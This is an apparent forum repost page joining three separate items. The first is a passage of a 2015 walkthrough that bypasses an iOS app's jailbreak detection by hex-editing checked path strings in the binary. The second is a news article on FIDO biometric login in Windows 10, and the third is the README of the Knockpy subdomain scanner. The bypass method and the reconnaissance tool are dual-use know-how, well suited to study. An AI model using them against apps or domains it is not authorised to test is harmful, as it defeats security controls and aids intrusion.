Hopper, one can check where these strings are referenced from. So, I followed this and landed up in a function that does what I would have expected a jailbreak detection function to do, but with a completely unexpected class/method name. –[MobileDisplay isRetinaDisplay]:. Very sneaky So we are working with the isRetinaDisplay method which is the one doing the jailbreak detection: As can be seen in the above screenshot, the fileExistsAtPath for /Applications/Cydia.app is hardly something I would have expected in a isRetinaDisplay implementation planning an attack At this stage, I was fairly certain that I had found the code I was looking for. From the method name isRetinaDisplay, I reasoned a little and guessed that this was actually supposed to say isJailBroken. I want this method to return false. My mind went straight to getting cycript ready for some method swizzling. I started to set things up and played around a little, when I realized that I don’t think I will be able to manipulate the runtime fast enough for this to work. Remember, the first thing the app does is check the jailbreak status. A bit of thinking, a few coffees, special alone time with Google and lots of reading, I come to realize that even if I was able to get this method swizzling to work, I’d have to do this every time the application starts up. This was not going to work for me. It was time to rethink my strategy. Considering how the jailbreak detection works, most of the ways that I saw in the application were related to file existence checks. There was also an attempt to write to /private/jailbreak.txt, as well as open a cydia:// url. I realized that I could probably just change these strings to things that will inherently fail and cause the method to not return true for any of the checks. in 1992 we had hex editors too I ssh’d into my iPad and located the applications installed directory. Once I had found this, I scp’d the compiled binary to my kali linux install, and opened it in a hex editor. I realized later I could have probably just used the binary I already had locally Referencing the disassembly of isRetinaDisplay, I searched for the strings it used using a Hex editor. Each string I would replace a few characters with 0 ensuring that I keep the original string length intact. For eg: /bin/bash was replaced with /bin/ba00. I ended up editing the following strings using the hex editor: /Applications/Cydia.app –> /Applications/Cyd00.app /Library/MobileSubstrate/MobileSubstrate.dylib –> /Library/MobileSubstrate/MobileSubstra00.dylib /bin/bash –> /bin/ba00 /usr/sbin/sshd –> /usr/sbin/ss00 /etc/apt –> /etc/a00 /private/jailbreak.txt –> /0000000/0000000000000 cydia://package/com.example.package –> cyd00://package/com.example.package I saved the modifications that I had done, and scp’d the binary back to my iPad to the folder where it was installed. I literally just overwrote the existing binary. At this stage I figured I will most certainly have some form of signing related problem as the binary has been tampered with. Well, this was not the case. Instead, I no longer was greeted with the lame jailbreak security error summary In the end, it was pretty easy to find the jailbreak detection code. Deducing a few things based on the disassembly made it easy to find the method responsible for the checks, regardless of the attempt to hide it via a name change. Furthermore, using something as simple as a hex editor, a trivial implementation such as this was very easily bypassed Posted by Leon Jacobs Feb 20th, 2015 bypass, hex, ios, jailbreak Sursa: https://leonjza.github.io/blog/2015/02/20/a-trivial-ios-jailbreak-detection-bypass/

Windows 10 embraces password-killing biometric authentication Ian Paul @ianpaul Ian is an independent writer based in Tel Aviv, Israel. His current focus is on all things tech including mobile devices, desktop and laptop computers, software, social networks, Web apps, tech-related legislation and corporate tech news. Microsoft is about to officially join the fight for authentication without pesky passwords. The company recently announced that Windows 10 will support the Fast Identity Online (FIDO) 2.0 specification. The end result is that instead of using passwords to log in to PCs, Microsoft services, and other third-party accounts, you’ll also be able to use a fingerprint or eye scan—possibly integrated with a key fob for two-factor authentication. In its blog post announcing FIDO in Windows 10, Microsoft focused largely on features that would interest IT types, such as FIDO support for major enterprise-focused cloud services including Office 365 Exchange Online, Salesforce, Citrix, and Box. But FIDO in Windows 10 will also work with consumer services such as Windows 10 sign-ins, Outlook.com, and OneDrive. Why this matters: The call to kill passwords with a better authentication solution have been ongoing for some time. FIDO appears to be the best chance for a one-size fits all solution to password-less authentication. The FIDO Alliance includes many major tech companies and other businesses with a big interest in security, including Arm, Bank of America, Google, Lenovo, Mastercard, PayPal, and Visa. Microsoft joined the FIDO Alliance in late 2013. When heavy hitters work together on problems like this the end result tends to be a near-universal solution—an absolute must if FIDO is to truly replace the password. What is FIDO? The idea behind FIDO isn’t all that new. Instead of using passwords—that can be forgotten, lost, stolen, or even guessed—a FIDO-equipped device would use biometrics such as fingerprint and eye scans that are much harder to acquire. This initial login method could also be paired with a key fob for two-factor authentication for added security. Biometric scanners have already been integrated into smartphones, laptops, and other devices for years. The difference with FIDO is that it’s an open standard, meaning any company can implement it into their products or services. It also means that FIDO-compliant biometric scanners and two-factor authentication devices can be used with any FIDO-supporting service, as opposed to the hodgepodge of fingerprint scanning security mechanisms we have now. The FIDO specifications are also designed so that a user’s biometric data never leaves the device. For anyone that wants to check it out, Microsoft says FIDO integration is already available in the Windows 10 Technical Preview for enterprise applications as well as Windows 10 sign-in. Sursa: Windows 10 embraces password-killing biometric authentication | PCWorld

Knock Subdomain Scan v.3.0rc1 Knockpy is a python tool designed to enumerate subdomains on a target domain through a wordlist. Usage knockpy [-h] [-v] [-w WORDLIST] [-r] [-z] domain positional arguments: domain specific target domain, like domain.com optional arguments: -h, --help show this help message and exit -v, --version show program's version number and exit -w WORDLIST specific path to wordlist file -r, --resolve resolve ip or domain name -z, --zone check for zone transfer note: the ALIAS name is marked in yellow. Example subdomain scan with internal wordlist knockpy domain.com subdomain scan with external wordlist knockpy domain.com -w wordlist.txt resolve domain name and get response headers knockpy -r domain.com check zone transfer for domain name knockpy -z domain.com Install from pypi (as root) pip install https://github.com/guelfoweb/knock/archive/knock3.zip or manually, download zip and extract folder cd knock-knock3/ (as root) python setup.py install note: tested with python 2.7.6 | is recommended to use google dns (8.8.8.8 | 8.8.4.4) Talk about Ethical Hacking and Penetration Testing Guide Book by Rafay Baloch Other This tool is currently maintained by Gianni 'guelfoweb' Amato, who can be contacted at guelfoweb@gmail.com or twitter @guelfoweb. Suggestions and criticism are welcome. Sponsored by Security Side Sursa: https://github.com/guelfoweb/knock/tree/knock3